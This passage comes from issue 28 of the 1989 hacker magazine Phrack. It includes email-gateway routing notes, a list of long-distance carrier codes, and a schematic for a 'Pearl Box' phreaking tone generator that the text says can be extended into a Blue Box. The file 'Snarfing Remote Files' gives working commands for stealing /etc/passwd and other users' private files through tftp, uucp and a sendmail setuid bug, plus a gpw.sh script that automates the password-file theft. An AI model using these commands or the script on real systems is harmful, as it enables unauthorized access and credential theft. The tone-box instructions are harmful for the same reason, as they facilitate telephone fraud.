  1424. separated by a "!"  (Example:  Subject:  [0756TK]randy!How's
  1425. Phrack?).
  1426.  
  1427. The only disadvantage of using DASnet as opposed to Wide-Area
  1428. networks is the cost.  Subscription costs as of 3/3/89 cost $4.75
  1429. per month or $5.75 per month for hosts that are outside of the
  1430. U.S.A.
  1431.  
  1432. You are also charged for each message that you send.  If you are
  1433. corresponding with someone who is not a DASnet subscriber, THEIR
  1434. MAIL TO YOU is billed to your account.
  1435.  
  1436. The following is an abbreviated cost list for mailing to the
  1437. different services of DASnet:
  1438.  
  1439.      PARTIAL List                DASnet Cost    DASnet Cost
  1440.      of Services                  1st 1000    Each Add'l 1000
  1441.      Linked by DASnet (e-mail)   Characters     Characters:
  1442.  
  1443.      INET, MacNET, PeaceNet,                             NOTE:  20 lines
  1444.      Unison, UUCP*, Domains,        .21            .11   of text is app.
  1445.      e.g. .COM, .EDU*                                    1000 characters.
  1446.  
  1447.      Dialcom--Any "host" in U.S.    .36            .25
  1448.  
  1449.      Dialcom--Hosts outside U.S.    .93            .83
  1450.  
  1451.      EasyLink (From EasyLink)       .21            .11
  1452.               (To EasyLink)         .55            .23
  1453.  
  1454.      U.S. FAX (internat'l avail.)   .79            .37
  1455.  
  1456.      GeoMail--Any "host" in U.S.    .21            .11
  1457.      GeoMail--Hosts outside U.S.    .74            .63
  1458.  
  1459.      MCI  (from MCI)                .21            .11
  1460.           (to MCI)                  .78            .25
  1461.           (Paper mail - USA)       2.31            .21
  1462.  
  1463.      Telemail                       .36            .25
  1464.  
  1465.      W.U. Telex--United States     1.79           1.63
  1466.      (You can also send Telexes outside the U.S.)
  1467.  
  1468.      TWICS--Japan                   .89            .47
  1469.  
  1470.   *  The charges given here are to the gateway to the network.  The DASnet
  1471.      user is not charged for transmission on the network itself.
  1472.  
  1473. Subscribers to DASnet get a free DASnet Network Directory as well
  1474. as a listing in the directory, and the ability to order optional
  1475. DASnet services like auto-porting or DASnet Telex Service which
  1476. gives you your own Telex number and answerback for $8.40 a month
  1477. at this time.
  1478.  
  1479. DASnet is a registered trademark of DA Systems, Inc.
  1480.  
  1481.                                DA Systems, Inc.  1503 E. Campbell
  1482.                              Ave.
  1483.                               Campbell, CA  95008 408-559-7434
  1484.                              TELEX:  910 380-3530
  1485.  
  1486. The following two sections on PeaceNet and AppleLink are in
  1487. association with DASnet as this network is what is used to
  1488. connect them to the Wide-Area Networks.
  1489.  
  1490. APPLELINK ~~~~~~~~~ AppleLink is a service of Apple Computer.
  1491. They have their own little network and there are a couple of
  1492. things to know about it.
  1493.  
  1494. First of all, there is an AppleLink-Bitnet Mail Relay which was
  1495. created to "enrich the cooperative research relationship of Apple
  1496. Computer and the higher education community by facilitating the
  1497. electronic exchange of information." Any Bitnet user is
  1498. automatically authorized to use the mail relay as well as all
  1499. AppleLink users.
  1500.  
  1501. To send to AppleLink from Bitnet, your header should be as
  1502. follows:
  1503.  
  1504. To:  XB.DAS@STANFORD.BITNET Subject:  username@APPLELINK!Hi, how
  1505. are things at Apple?
  1506.  
  1507. The username is the user's ID that you are sending to and the "!"
  1508. separates the DASnet To:  field from the real subject.
  1509.  
  1510. To send to Bitnet from AppleLink, your header should be as
  1511. follows:
  1512.  
  1513. To:  DASNET Subject:  C488869@UMCVMB.BITNET!Please add me to the
  1514. Phrack Subscription List.
  1515.  
  1516. The C488869@UMCVMB.BITNET (my address) is any Bitnet address and
  1517. as above, the "!" separates the address from the subject of the
  1518. message.
  1519.  
  1520. There is one other thing to mention.  Apparently, sending to
  1521. username@APPLELINK.APPLE.COM also will perform the same function.
  1522. If this does not work, try routing to
  1523. username%APPLELINK.APPLE.COM@APPLE.COM.
  1524.  
  1525. PEACENET ~~~~~~~~ PeaceNet is a computer-based communication
  1526. system "helping the peace movement throughout the world
  1527. communicate and cooperate more effectively and efficiently,"
  1528. according to their information flier.  It is networked through
  1529. Telenet and can be reached via dial-up.  To subscribe to this
  1530. service, it costs $10 to sign up.  With this sign-up fee, you
  1531. receive a user's manual and a "free" hour of off-peak computer
  1532. time (which is weekday evenings, weekends, and
  1533. holidays).  Beyond this, you pay a monthly $10 fee for another
  1534. hour of off-peak computer usage and you pay $5 for additional
  1535. PEAK hour usage.  They charge, also, for users who require extra
  1536. space on their system.  I guess peace carries a heavy cost in the
  1537. long run!  You do get 2 free hours of off-peak time though for
  1538. every additional user you bring to PeaceNet.  It is a project of
  1539. the Tides Foundation, a San Franciscan public charity, and is
  1540. managed by 3 national peace organizations (non-profit, of
  1541. course!).  Anyway, to join PeaceNet, send your name,
  1542. organizational affiliation, address, city, state, zip code,
  1543. telephone number, and who referred you to PeaceNet as well as
  1544. your credit card number with expiration date (and the name on the
  1545. card if it's different than yours) to PeaceNet, 3228 Sacramento
  1546. Street, San Francisco, CA 94115 or call them at 415-923-0900.
  1547. You can also pay by check but that requires a $50 deposit.
  1548.  
  1549. FIDONET
  1550. ~~~~~~~
  1551. FIDONET is, of course, the ever-popular group of IBM bulletin
  1552. boards that made it possible for networking to be incorporated
  1553. into bulletin board systems.  FIDONET seems to have a number of
  1554. gateways in the Wide-Area Networks.  First of all, it has its own
  1555. domain -- .ifna.org -- which makes it possible to mail right to
  1556. FIDONET without routing through UUCP gateways or whatever.  The
  1557. format for this gateway is:
  1558.  
  1559. Username@f<node #>.n<net #>.z<zone #>.ifna.org
  1560.  
  1561. In other words, if I wanted to mail to Silicon Swindler at
  1562. 1:135/5, the address would be
  1563. Silicon_Swindler@f5.n135.z1.ifna.org and, provided that your
  1564. mailer knows the .ifna.org domain, it should get through alright.
  1565. Apparently, as of the writing of this article, they have
  1566. implemented a new gateway name called fidonet.org which should
  1567. work in place of ifna.org in all routings.  If your mailer does
  1568. not know either of these domains, use the above routing but
  1569. replace the first "@" with a "%" and then afterwards, use either
  1570. of the following mailers after the "@":  CS.ORST.EDU or
  1571. K9.CS.ORST.EDU (i.e. username%f<node #>.n<net #>.z<zone
  1572. #>.fidonet.org@CS.ORST.EDU [or replace CS.ORST.EDU with
  1573. K9.CS.ORST.EDU]).
  1574.  
  1575. The following is a list compiled by Bill Fenner (WCF@PSUECL.BITNET) that was
  1576. posted on INFONETS DIGEST which lists a number of FIDONET gateways:
  1577.  
  1578. Net      Node    Node Name
  1579. ~~~      ~~~~    ~~~~~~~~~
  1580. 104      56      milehi.ifna.org
  1581. 105      55      casper.ifna.org
  1582. 107      320     rubbs.ifna.org
  1583. 109      661     blkcat.ifna.org
  1584. 125      406     fidogate.ifna.org
  1585. 128      19      hipshk.ifna.org
  1586. 129      65      insight.ifna.org
  1587. 143      N/A     fidogate.ifna.org
  1588. 152      200     castle.ifna.org
  1589. 161      N/A     fidogate.ifna.org
  1590. 369      17      megasys.ifna.org
  1591.  
  1592. NOTE:  The UUCP equivalent node name is the first part of the node name.  In
  1593.        other words, the UUCP node milehi is listed as milehi.ifna.org but can
  1594.        be mailed directly over the UUCP network.
  1595.  
  1596. Another way to mail to FIDONET, specifically for Internet people, is in this
  1597. format:
  1598.  
  1599. ihnp4!necntc!ncoast!ohiont!<net #>!<node #>!user_name@husc6.harvard.edu
  1600.  
  1601. And for those UUCP mailing people out there, just use the path described and
  1602. ignore the @husc5.harvard.edu portion. There is a FIDONET NODELIST available on
  1603. most any FIDONET bulletin board, but it is quite large.
  1604.  
  1605. ONTYME
  1606. ~~~~~~
  1607. Previously known as Tymnet, OnTyme is the McDonnell Douglas revision.  After
  1608. they bought out Tymnet, they renamed the company and opened an experimental
  1609. Internet gateway at ONTYME.TYMNET.COM but this is supposedly only good for
  1610. certain corporate addresses within McDonnell Douglas and Tymnet, not their
  1611. customers.  The userid format is xx.yyy or xx.y/yy where xx is a net name and
  1612. yyy (or y/yy) is a true username.  If you cannot directly nail this, try:
  1613.  
  1614. xx.yyy%ONTYME.TYMNET.COM@TYMIX.TYMNET.COM
  1615.  
  1616. A subnet of Tymnet is called GeoNet.  It is a private X.25-based
  1617. subnet that is operated by the U.S. Geological Survey, a bureau
  1618. of the U.S. Department of the Interior.  It supports about 165
  1619. host computers including about 75 USGS Primes, 50 VAXen, and 2
  1620. Amdahls.  One of their VAX systems is on BITnet at USGSRESV and
  1621. they have SPAN nodes at IFLAG1.SPAN and EROSA.SPAN.
  1622.  
  1623. THENET
  1624. ~~~~~~
  1625. The Texas Higher Education Network (THEnet) is comprised of many
  1626. of the institutions of higher education in the state of Texas.
  1627. Its backbone network protocol is DECnet.  THEnet has recently
  1628. been designated as an NSF regional network, distributing Internet
  1629. Protocol (IP) access over DECnet in some cases and utilizing
  1630. multi-protocol routers in others.  THEnet has a NIC (Network
  1631. Information Center) at THENIC.THE.NET and addresses within THEnet
  1632. are probably routed to user@destination.THE.NET.
  1633.  
  1634. UUCP PATHS AND NODE INFORMATION
  1635. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1636. Many UUCP Unix nodes have the commands uuhosts and uupath.  The
  1637. uuhosts command allows you to receive information about a
  1638. specified UUCP node such as the path, node contact, how it is
  1639. polled for USENET feeds, etc.  The uupath command simply tells
  1640. you the path from one UUCP node to another.  Well, although at
  1641. this time, this is only good for Bitnet users, this interactive
  1642. message feature is good to know just in case you need to know a
  1643. path to a particular node.  For IBM systems using RSCS network
  1644. software, use the command
  1645.  
  1646. SM RSCS CMD PSUVAX1 UUPATH node1 node2 ...
  1647.  
  1648.      (For people on VAXen with JNET network software, the format is:     )
  1649.      (SEND/COMMAND PSUVAX1 UUPATH node1                                  )
  1650.  
  1651. to receive standard information listed above from the uupath command.
  1652.  
  1653. Multiple nodes can be listed where node1 node2 represent separate UUCP nodes.
  1654.  
  1655. I've found that this can be useful in finding surrounding nodes
  1656. of the destination node in case you have a problem mailing
  1657. through a particular path or node.  You can, with this command,
  1658. use alternate routings by specifying them with a "bang-path" that
  1659. will indicate to the UUCP gateway where the message is to be sent
  1660. to next.  This is in the format of, say,
  1661. "psuvax1!catch22!msp!taran@UUCPGATE" or whatever where UUCPGATE
  1662. can be any UUCP gateway such as PSUVAX1 or UUNET.UU.NET to name a
  1663. few.
  1664.  
  1665. NICS
  1666. ~~~~
  1667. The Network Information Centers (NICs) can be extremely useful in
  1668. figuring out various problems on the networks, such as routings
  1669. or the place at which the node resides, etc.
  1670.  
  1671. BITNIC is the BITnet Network Information Center which is located
  1672. in New Jersey.  Its node name is BITNIC.BITNET and it contains a
  1673. variety of resources which can be utilized via mail or via direct
  1674. messages from Bitnet users.
  1675.  
  1676. The DATABASE@BITNIC contains lists of all kinds.  This database
  1677. does not limit itself to information about the networks.  It does
  1678. contain this information, but also holds various trivialities.
  1679. Send the HELP command either via direct message to
  1680. DATABASE@BITNIC if on Bitnet or send mail to that address
  1681. containing the command you wish to perform (i.e. send a message
  1682. saying HELP to DATABASE@BITNIC.BITNET from another network or
  1683. from Bitnet if you're at a node without direct message
  1684. capabilities).
  1685.  
  1686. LISTSERV@BITNIC contains the standard listserver files that you'd
  1687. expect to find plus some other interesting ones.  I'm not going
  1688. to take the time to tutor you, the reader, in using these, so
  1689. just send a HELP command the same as you would to DATABASE@BITNIC
  1690. for more information.
  1691.  
  1692. NETSERV@BITNIC is a file server which contains information files
  1693. pertaining to various networks that are connected to Bitnet, as
  1694. well as files about Bitnet.  From here, you can get network node
  1695. lists, information files on networks such as SPAN, ARPANET,
  1696. NETNORTH, etc. and other network related files.  This can be an
  1697. extremely useful resource when you're trying to mail someone at
  1698. another network.
  1699.  
  1700. The Data Defense Network NIC (DDN NIC) is located at SRI-NIC.ARPA
  1701. and has various useful files about the DDN as well as the
  1702. Internet.
  1703.  
  1704. There are a number of ways to obtain information from the DDN
  1705. NIC.  First of all, people on the Internet with the Telnet
  1706. capability can Telnet to SRI-NIC.ARPA and perform a number of
  1707. procedures from the pre-login screen.  First of all, you can get
  1708. TAC News updates by typing TACNEWS.  The NIC command allows you
  1709. to find various facts about the whereabouts of network
  1710. information files, etc.  The WHOIS command is probably the most
  1711. useful of these 3.  The WHOIS program allows you to find
  1712. addresses for registered users of the networks as well as
  1713. information about networks and nodes on the networks, depending
  1714. on what you ask the WHOIS program for.  To find only a certain
  1715. record type, you can use the following specifiers:
  1716.  
  1717. Arpanet        DOmain         GAteway        GRoup          HOst           IMp
  1718. Milnet         NEtwork        Organization   PSn            TAc
  1719.  
  1720. To search for a specific field, use the following specifiers:
  1721.  
  1722. HAndle or "!"    Mailbox or if it contains "@"        NAme or a "." leading
  1723.  
  1724. These features return whatever information is available from the DDN NIC
  1725. database.  If you do not have the capability to use Telnet, mail can be sent to
  1726. SERVICE@SRI-NIC.ARPA with the "SUBJECT:" line containing the following
  1727. commands:
  1728.  
  1729. HELP          This will send you a help file for using the DDN NIC.
  1730. RFC nnn       This sends you a Request For Comments file (where nnn is either
  1731.               the number of the RFC file or else is INDEX to list them).
  1732. IEN nnn       This sends you an Internet Engineering Notes file where nnn is
  1733.               the same as above.
  1734. NETINFO xxx   This feature allows you to get files about the networks where
  1735.               xxx is the filename or else the word INDEX for a list of
  1736.               available files.
  1737. HOST xxx      This returns information pertaining to the xxx host specified.
  1738. WHOIS xxx     This is the same as using the WHOIS command from Telnet.  For
  1739.               details on how to use this, send the WHOIS HELP command on the
  1740.               "Subject:" line.
  1741.  
  1742. There are other Network Information Centers throughout the networks but as far
  1743. as I know, their abilities are nothing near as powerful as SRI-NIC.ARPA.  They
  1744. are the places, though, to mail to for answers concerning those networks if
  1745. you have some question as to the workings of the network or anything else.
  1746. _______________________________________________________________________________
  1747.  
  1748.                                 ==Phrack Inc.==
  1749.  
  1750.                      Volume Three, Issue 28, File #5 of 12
  1751.  
  1752.                   /////////////////////\\\\\\\\\\\\\\\\\\\\\
  1753.                  ||                                        ||
  1754.                  || A Real Functioning PEARL BOX Schematic ||
  1755.                  ||                                        ||
  1756.                  ||        Written, Tested, and Used       ||
  1757.                  ||                                        ||
  1758.                  ||               by Dispater              ||
  1759.                  ||                                        ||
  1760.                  ||              July 1, 1989              ||
  1761.                  ||                                        ||
  1762.                   \\\\\\\\\\\\\\\\\\\\\/////////////////////
  1763.  
  1764.  
  1765. Introduction:  After reading the earlier renditions of schematics
  1766.                for the Pearl Box, I decided that there was an
  1767.                easier and cheaper way of doing the same thing
  1768.                with an IC and parts you probably have just laying
  1769.                around the house.
  1770.  
  1771.  
  1772. What Is A Pearl Box and Why Do I Want One?
  1773.  
  1774.      A Pearl Box is a tone generating device that is used to make
  1775.      a wide range of single tones.  Therefore, it would be very
  1776.      easy to modify this basic design to make a Blue Box by
  1777.      making 2 Pearl Boxes and joining them together in some
  1778.      fashion.
  1779.  
  1780.      A Pearl Box can be used to create any tone you wish that
  1781.      other boxes may not.  It also has a tone sweep option that
  1782.      can be used for numerous things like detecting different
  1783.      types of phone tapping devices.
  1784.  
  1785.  
  1786. Parts List:
  1787.  
  1788.         CD4049 RCA integrated circuit
  1789.         .1 uF disk capacitor
  1790.         1 uF 16V electrolitic capacitor
  1791.         1K resistor
  1792.         10M resistor
  1793.         1meg pot
  1794.         1N914 diode
  1795.         Some SPST momentary push-button switches
  1796.         1 SPDT toggle switch
  1797.         9 Volt battery & clip
  1798.         and miscellaneous stuff you should have laying around the house.
  1799.  
  1800.  
  1801. State-of-the-Art-Text Schematic:
  1802.                                        +  16V  1uF -
  1803.               _______________________________||_____
  1804.              |        !     !                ||     |           _
  1805.              |   _______________________            |__________| |/| 8ohms
  1806.          ____|__|_____:__|__:__|_       |            __________| | |
  1807.         | 9 10 11 12 13 14 15 16 |      |           |          |_|\|
  1808.         |        CD4049UBE       |      |           |
  1809.         |_1__2__3__4__5__6__7__8_|      :           |          _
  1810.           |  |  |__|  |__|  |  |____________________|_________[-]
  1811.           |  |  !           !           :                     [b]
  1812.           |  |__________________________|                     [a]
  1813.           |     :           :           |                     [t]
  1814.           |     !    1N914  !           !                     [t]
  1815.           |___________|/|_____________________________________[+]
  1816.                 :     |\|   :           :
  1817.                 |           |           |
  1818.                 |    10M    |           |
  1819.                 |___/\/\/\__|           |
  1820.                 |           |           |
  1821.                 |_____||____|           |  <-- These 2 wires to the center pole
  1822.                       ||    |           |      of switch.
  1823.                  .1uF   50V |           |
  1824.                             |           |
  1825.      _______________________|           |_____________________________
  1826.     |                   ___[Toggle Switch]____________                |
  1827.     |                  |                              |          ___  |
  1828.     |                  |                              |          o o  |
  1829.     |                  |                              | /\/\/\___| |__|
  1830.     |_/\/\/\____/\/\/\ |                              |    ^          |
  1831.         1K         ^   |                              |____|     ___  |
  1832.                    |___|                              |          o o  |
  1833.                                                       | /\/\/\___| |__|
  1834.           (pot side)                    (push-button  |  ^
  1835.                                             side)     |__|
  1836.  
  1837. Explanation:
  1838.  
  1839.      The 2 wires that lead from the main part of the circuit
  1840.      should be connected to the center poles on the toggle
  1841.      switch.  Put the 2 wires to the pot on one side and the 2
  1842.      wires going to the push-buttons to the other side.  That way
  1843.      you can switch between tone sweep and the favorite tones you
  1844.      like (the push-button side).
  1845.  
  1846.      To keep tones that you want to use frequently like 1850 Hz
  1847.      then all you have to do is put in a variable resistor and
  1848.      adjust it to where you have the correct tone, then just put
  1849.      a push-button switch on the line.  You can link them
  1850.      together in a chain, etc.  There are many other good
  1851.      modifications to make to the box so have fun and be smart.
  1852.  
  1853. --Dispater
  1854.  
  1855. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\?///////////////////////////////////////
  1856.                                 ==Phrack Inc.==
  1857.  
  1858.                      Volume Three, Issue 28, File #6 of 12
  1859.  
  1860.                      +++++++++++++++++++++++++++++++++++++
  1861.                      +                                   +
  1862.                      +       Snarfing Remote Files       +
  1863.                      +                                   +
  1864.                      +                by                 +
  1865.                      +                                   +
  1866.                      +           Dark OverLord           +
  1867.                      +                                   +
  1868.                      +++++++++++++++++++++++++++++++++++++
  1869.  
  1870. There are many ways of getting copies of files from a remote
  1871. system that you do not have permission to read or an account on
  1872. login on to and access them through.  Many administrators do not
  1873. even bother to restrict many access points that you can use.
  1874.  
  1875. Here are the simplest ways:
  1876.  
  1877.  
  1878. A)  Use uucp(1) [Trivial File Transfer Protocol] to retrieve a copy
  1879.     of a file if you are running on an Internet based network.
  1880.  
  1881. B) Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy
  1882.    of a file if uucp connections are running on that system.
  1883.  
  1884. C) Access one of many known security loopholes.
  1885.  
  1886.  
  1887. In the following examples, we will use the passwd file as the
  1888. file to acquire since it is a readable file that can be found on
  1889. most systems that these attacks are valid on.
  1890.  
  1891. Method A :
  1892.  
  1893. 1) First start the tftp program:  Enter the command:
  1894.  
  1895.  tftp
  1896.  
  1897.     [You have the following prompt:]
  1898.  
  1899.  tftp>
  1900.  
  1901.  
  1902. 2) The next step is to connect to the system that you wish to
  1903.     retrieve files from.  At the tftp, type:
  1904.  
  1905.  tftp> connect other.system.com
  1906.  
  1907.  
  1908. 3) Now request the file you wish to get a copy of (in our case, the
  1909.     passwd file /etc/passwd ):
  1910.  
  1911.  tftp> get /etc/passwd /tmp/passwd
  1912.  
  1913.     [You should see something that looks like the following:]
  1914.  
  1915.  Received 185659 bytes in 22 seconds.
  1916.  
  1917. 4) Now exit the tftp program with the "quit" command:
  1918.  
  1919.  tftp> quit
  1920.  
  1921. You should now have a copy of other.system.com's passwd file in
  1922. your directory.
  1923.  
  1924. NOTE:  Some Unix systems' tftp programs have a different syntax.
  1925.        The above was tested under SunOS 4.0
  1926.  
  1927. For example, on Apollos, the syntax is:
  1928.  
  1929.     tftp -{g|g!|p|r|w} <local file> <host> <foreign file>
  1930. [netascii|image]
  1931.  
  1932. Thus you must use the command:
  1933.  
  1934.  tftp -g password_file networked-host /etc/passwd
  1935.  
  1936. Consult your local "man" pages for more info (or in other words
  1937. RTFM).
  1938.  
  1939. At the end of this article, I will include a shell script that
  1940. will snarf a password file from a remote host.  To use it type:
  1941.  
  1942.  gpw system_name
  1943.  
  1944. Method B :
  1945.  
  1946. Assuming we are getting the file  /etc/passwd  from the system
  1947. uusucker, and our system has a direct uucp connection to that
  1948. system, it is possible to request a copy of the file through the
  1949. uucp links.  The following command will request that a copy of
  1950. the passwd file be copied into uucp's home directory
  1951. /usr/spool/uucppublic :
  1952.  
  1953.  uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd'
  1954.  
  1955. The flag "-m" means you will be notified by mail when the transfer is
  1956. completed.
  1957.  
  1958. Method C:
  1959.  
  1960.     The third possible way to access the desired file requires
  1961. that you have the login permission to the system.
  1962.  
  1963. In this case we will utilize a well-known bug in Unix's sendmail
  1964. daemon.
  1965.  
  1966. The sendmail program has and option "-C" in which you can specify
  1967. the configuration file to use (by default this file is
  1968. /usr/lib/sendmail.cf or /etc/sendmail.cf).  It should also be
  1969. noted that the diagnostics outputted by sendmail contain the
  1970. offending lines of text.  Also note that the sendmail program
  1971. runs setuid root.
  1972.  
  1973. The way you can abuse this set of facts (if you have not yet
  1974. guessed) is by specifying the file you wish read as the
  1975. configuration file.  Thus the command:
  1976.  
  1977.  sendmail -C/usr/accounts/random_joe/private/file
  1978.  
  1979. Will give you a copy of random joe's private file.
  1980.  
  1981. Another similar trick is to symlink your .mailcf file to joe's
  1982. file and mail someone.  When mail executes sendmail (to send the
  1983. mail), it will load in your .mailcf and barf out joe's stuff.
  1984.  
  1985. First, link joe's file to your .mailcf .
  1986.  
  1987.  ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf
  1988.  
  1989. Next, send mail to someone.
  1990.  
  1991.  mail C488869@umcvmb.missouri.edu
  1992.  
  1993. And have fun.
  1994.  
  1995. -=-Cut Here=-=-=-Cut Here=-=-=- gpw.sh =-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-=
  1996. :
  1997. : gpw copyright(c) Dark Overlord
  1998. :
  1999. /usr/ucb/tftp $1 << EOF
  2000. mode ascii
  2001. verbose
  2002. trace
  2003. get /etc/passwd /tmp/pw.$1
  2004. quit
  2005. EOF
  2006. -=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-=
  2007. ___________________________________________________________
  2008. ====================================================
  2009.  
  2010.                                 ==Phrack Inc.==
  2011.  
  2012.                      Volume Three, Issue 28, File #7 of 12
  2013.                      ____________________________________
  2014.                      \                                  /
  2015.                       \  Other Common Carriers (OCCs)  /
  2016.                        \                              /
  2017.                         \    A List By Equal Axis    /
  2018.                          \                          /
  2019.                           \   September 19, 1989   /
  2020.                            \______________________/
  2021.  
  2022. Hi everyone.  One hundred percent accuracy is not guaranteed.
  2023. Many small long distance companies operate for a few months or a
  2024. year and then then merge with others or go out of business, etc.
  2025. Also, not all of the places listed below work in every location.
  2026. The only ones you can assume work almost everywhere are MCI,
  2027. Sprint, AT&T, Western Union, and Telecom USA.  Most of the others
  2028. are strictly local, appearing in just a few states or cities.
  2029.  
  2030. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2031.  
  2032. 001     MidAmerican LD (Republic Telecom)
  2033. 002     AmeriCall LDC
  2034. 003     RCI Corporation
  2035. 007     Tel America
  2036. 011     Metromedia Long Distance
  2037. 012     Charter Corporation (Tri-J)
  2038. 013     Access Services
  2039. 021     Mercury
  2040. 022     MCI Telecommunications
  2041. 023     Texnet
  2042. 024     Petricca Communications Systems
  2043. 028     Texnet
  2044. 030     Valu-Line of Wichita Falls
  2045. 031     Teltec Saving Communications
  2046. 033     US Sprint
  2047. 036     Long Distance Savers
  2048. 039     Electronic Office Centers of America (EO/Tech)
  2049. 042     First Phone
  2050. 044     Allnet Communication Services (LDX, Lexitel)
  2051. 053     American Network (Starnet)
  2052. 056     American Satellite
  2053. 057     Long Distance Satellite
  2054. 059     COMNET
  2055. 060     Valu-Line of West Texas
  2056. 063     COMNET
  2057. 069     V/COM
  2058. 070     National Telephone Exchange
  2059. 080     AMTEL Systems
  2060. 084     Long Distance Service (LDS)
  2061. 085     WesTel
  2062. 088     Satellite Business Systems (MCI)
  2063. 089     Telephone Systems
  2064. 090     WesTel
  2065. 093     Rainbow Communications
  2066. 095     Southwest Communications
  2067. 099     AmeriCall
  2068. 122     RCA Global Communications
  2069. 137     All America Cables and Radio (ITT)
  2070. 142     First Phone
  2071. 146     ARGO Communications
  2072. 188     Satellite Business Systems
  2073. 201     PhoneNet
  2074. 202     ExecuLines
  2075. 203     Cypress Telecommunications (Cytel)
  2076. 204     United Telephone Long Distance
  2077. 206     United Telephone Long Distance
  2078. 211     RCI
  2079. 212     Call US
  2080. 213     Long Distance Telephone Savers
  2081. 214     Tyler Telecom
  2082. 215     Star Tel of Abilene
  2083. 217     Call US
  2084. 219     Call USA
  2085. 220     Western Union Telegraph
  2086. 222     MCI Telecommunications (SBS)
  2087. 223     Cable & Wireless Communication (TDX)
  2088. 224     American Communications
  2089. 227     ATH Communications (Call America)
  2090. 229     Bay Communications
  2091. 232     Superior Telecom
  2092. 233     Delta Communications
  2093. 234     AC Teleconnect (Alternative Communication)
  2094. 237     Inter-Comm Telephone
  2095. 239     Woof Communications (ACT)
  2096. 241     American Long Lines
  2097. 242     Choice Information Systems
  2098. 244     Automated Communications
  2099. 245     Taconic Long Distance Service
  2100. 250     Dial-Net
  2101. 252     Long Distance/USA
  2102. 253     Litel Telecommunications
  2103. 255     All-State Communications
  2104. 256     American Sharecom
  2105. 260     Advanced Communications Systems
  2106. 263     Com Systems (Sun Dial Communications)
  2107. 268     Compute-A-Call
  2108. 276     CP National (American Network, Starnet)
  2109. 284     American Telenet
  2110. 286     Clark Telecommunications
  2111. 287     ATS Communications
  2112. 288     AT&T Communications
  2113. 298     Thriftline
  2114. 302     Austin Bestline
  2115. 303     MidAmerican LD (Republic Telecom)
  2116. 311     SaveNet (American Network, Starnet)
  2117. 318     Long Distance Savers
  2118. 321     Southland Systems
  2119. 322     American Sharecom
  2120. 324     First Communication
  2121. 331     Texustel
  2122. 333     US Sprint
  2123. 336     Florida Digital Network
  2124. 338     Midco Communications
  2125. 339     Communication Cable Laying
  2126. 343     Communication Cable Laying
  2127. 345     AC Teleconnect (Alternative Communication)
  2128. 350     Dial-Net
  2129. 355     US Link
  2130. 357     Manitowoc Long Distance Service
  2131. 362     Electronic Office Centers of America (EO/Tech)
  2132. 363     Tel-Toll (Econ-O-Dial of Bishop)
  2133. 369     American Satellite
  2134. 373     Econo-Line Waco
  2135. 375     Wertern Union Telegraph
  2136. 385     The Switchboard
  2137. 393     Execulines of Florida
  2138. 400     American Sharecom
  2139. 404     MidAmerican LD (Republic Telecom)
  2140. 412     Penn Telecom
  2141. 428     Inter-Comm Telephone
  2142. 432     Lightcall
  2143. 435     Call-USA
  2144. 436     Indiana Switch
  2145. 440     Tex-Net
  2146. 441     Escondido Telephone
  2147. 442     First Phone
  2148. 444     Allnet Communication Services (LDX, Lexitel)
  2149. 455     Telecom Long Distance
  2150. 456     ARGO Communications
  2151. 462     American Network Services
  2152. 464     Houston Network
  2153. 465     Intelco
  2154. 466     International Office Networks
  2155. 469     GMW
  2156. 472     Hal-Rad Communications
  2157. 480     Chico Telecom (Call America)
  2158. 488     United States Transmission Systems (ITT)
  2159. 505     San Marcos Long Distance
  2160. 515     Burlington Telephone
  2161. 529     Southern Oregon Long Distance
  2162. 532     Long Distance America
  2163. 533     Long Distance Discount
  2164. 536     Long Distance Management
  2165. 550     Valu-Line of Alexandria
  2166. 551     Pittsburg Communication Systems
  2167. 552     First Phone
  2168. 555     TeleSphere Networks
  2169. 566     Cable & Wireless Communication (TDX)
  2170. 567     Advanced Marketing Services (Dial Anywhere)
  2171. 579     Lintel System (Lincoln Telephone LD)
  2172. 590     Wisconsin Telecommunications Tech
  2173. 599     Texas Long Distance Conroe
  2174. 601     Discount Communications Services
  2175. 606     Biz Tel Long Distance Telephone
  2176. 622     Metro America Communications
  2177. 634     Econo-Line Midland
  2178. 646     Contact America
  2179. 654     Cincinnati Bell Long Distance
  2180. 655     Ken-Tel Service
  2181. 660     Tex-Net
  2182. 666     Southwest Communications
  2183. 675     Network Services
  2184. 680     Midwest Telephone Service
  2185. 682     Ashland Call America
  2186. 684     Nacogdoches Telecommunications
  2187. 687     NTS Communications
  2188. 700     Tel-America
  2189. 704     Inter-Exchange Communications
  2190. 707     Telvue
  2191. 709     Tel-America
  2192. 717     Pass Word
  2193. 726     Procom
  2194. 727     Conroe-Comtel
  2195. 735     Marinette-Menominee Lds
  2196. 737     National Telecommunications
  2197. 741     ClayDesta
  2198. 742     Phone America of Carolina
  2199. 743     Peninsula Long Distance Service
  2200. 747     Standard Informations Services
  2201. 755     Sears Communication
  2202. 757     Pace Long Distance Service
  2203. 759     Telenet Communication (US Sprint)
  2204. 760     American Satellite
  2205. 766     Yavapai Telephone Exchange
  2206. 771     Telesystems
  2207. 777     US Sprint
  2208. 785     Olympia Telecom
  2209. 786     Shared Use Network Service
  2210. 787     Star Tel of Abilene
  2211. 788     ASCI's Telepone Express Network
  2212. 789     Microtel
  2213. 792     Southwest Communications
  2214. 800     Satelco
  2215. 801     MidAmerican LD (Republic)
  2216. 827     TCS Network Services
  2217. 833     Business Telecom
  2218. 839     Cable & Wireless Communication (TDX)
  2219. 847     VIP Connections
  2220. 850     TK Communications
  2221. 852     Telecommunicatons Systems
  2222. 859     Valu-Line of Longview
  2223. 866     Alascom
  2224. 872     Telecommunications Services
  2225. 874     Tri-Tel Communications
  2226. 879     Thriftycall (Lintel Systems)
  2227. 881     Coastal Telephone
  2228. 882     Tuck Data Communications
  2229. 883     TTI Midland-Odessa
  2230. 884     TTI Midland-Odessa
  2231. 885     The CommuniGroup
  2232. 888     Satellite Business Systems (MCI)
  2233. 895     Texas on Line
  2234. 897     Leslie Hammond (Phone America)
  2235. 898     Satellite Business Systems (MCI)
  2236. 910     Montgomery Telamarketing Communication
  2237. 915     Tele Tech
